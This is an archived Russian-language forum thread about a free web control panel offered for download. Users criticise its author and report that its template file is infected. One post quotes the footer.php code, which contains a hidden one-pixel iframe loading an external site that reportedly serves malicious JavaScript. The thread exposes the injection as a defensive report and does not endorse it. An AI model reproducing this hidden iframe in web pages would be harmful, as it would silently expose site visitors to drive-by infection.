Архив - только для чтения | |
Модератор форума: andycrowz |
Форум Корзина форума Корзина ★☪TRpanel by [AlQaida]☪★ (☪Для тех кто мучается,искать ЛК☪) |
★☪TRpanel by [AlQaida]☪★ |
Готов представить вам мой Личный Кабинет,красивый,с бонус-системой
![]() Code Скрин Скачать Понравилось,ставь + , забирай все просто. Товарисчи Тролли,возмущаться идите в флудилке.Если не нравится Слейте из этой темы. Я все сказал ![]()
Я считаю: Троллевские сообщения в темах просто - тупое набиваение постов!
|
Quote (ALQaida) очень стильный А в чем стиль? Я, например, абсолютно без опыта в верстке, и, с абсолютно кривыми руками, в том, что касается дизайна, могу склепать вам даже без помощью CSS и блочной верстки, тупо на таблицах такой же "стильный" сайт, поставив background'ом пафосную картинку. Выглядеть будет так же уныло, гарантирую.
Arcanum Core © Dev.
Для запросов на выдачу наград/снятие замечаний есть темы в Работе Портала. Не пишите по этому поводу в личку. |
mizer, Вы не понимаете ни мвц, ни основ ооп. И даже не знаете основ процедурного программирования.
Не льстите себе и не вводите в заблуждение окружающих, которые ведуться на красивые слова. |
mizer, вы монстр) напишите, посмеёмся вместе над вашей шуткой
![]() вы даже слова MVC не понимаете... в противном случае не писали бы "на MVC" |
MVC и ООП - 2 новых модных слова на форуме
![]() Ими можно профанов подкупать) И плевать, что логики этих подходов не понимаешь)
Сообщение # 12 написано 27.01.2012 в 01:07
|
Да видел я ваше обучение)
Пытаться вызвать динамический объект класса с помощью статического объявления метода - это 5 балов.
Сообщение # 14 написано 27.01.2012 в 01:17
|
Bestmore, если бы он учился, а не людям фуфло толкал, не трогал бы его)
Сообщение # 17 написано 27.01.2012 в 11:52
|
Quote (mizer) как сделаю нечто хорошее, буду продовать в этом-то всё и дело. пок вы "учитесь", чтобы продать что-либо, вы ничему не научитесь. а рассказывать мне про свой небывалый прорыв в знаниях не нужно) я с детства в сказки не верю
Сообщение # 23 написано 27.01.2012 в 23:29
|
ЛК говно... Только что скачал и уже антивирус пищит то что там вирусов больше чем .php скриптов.
Добавлено (28.01.2012, 09:12) Добавлено (28.01.2012, 09:13) Добавлено (28.01.2012, 09:15) Code </td> <td id="right"> <?include "templates/$cp_template/menu.php"?> </td> </tr> </tbody></table></td></tr></table> </div> </div> <center> <div id="footer">Copyright © 2012 TrinityPanel 3.3.5а by ALQaida<a href=<?echo $site_url?>>«<?echo $site_name?>»</a> </div> <iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe> </body></html> Все что там написано а фаил зараженный. странно. Добавлено (28.01.2012, 09:16)
Сообщение # 25 написано 28.01.2012 в 09:16
|
Quote (doomkas) так что лучше перезалей лк если это из за случайности. А так минус заслужил. Все перезалил надеюсь исправил. Добавлено (28.01.2012, 09:37)
Я считаю: Троллевские сообщения в темах просто - тупое набиваение постов!
Сообщение # 26 написано 28.01.2012 в 09:37
|
doomkas, я скачал у меня ничего не пищит,нод32 лицензия.
у тебя наверно аваст или унылый касперский который на каждый файл агрится. советую прежде чем закритиковать чью либо работу,попробуйте написать сами. Я на 90% уверен что те кто больше всего тут утверждал что лк уг себе его на свою однодневку и поставит... |
Quote (doomkas) В папе template->lich footer.php там вирусы сидят. Там не вирус, а фрейм который ведет на сайт на котором js зараженный. Вот строчка: Quote <iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe> ![]()
Сообщение # 29 написано 29.01.2012 в 12:47
|
| |||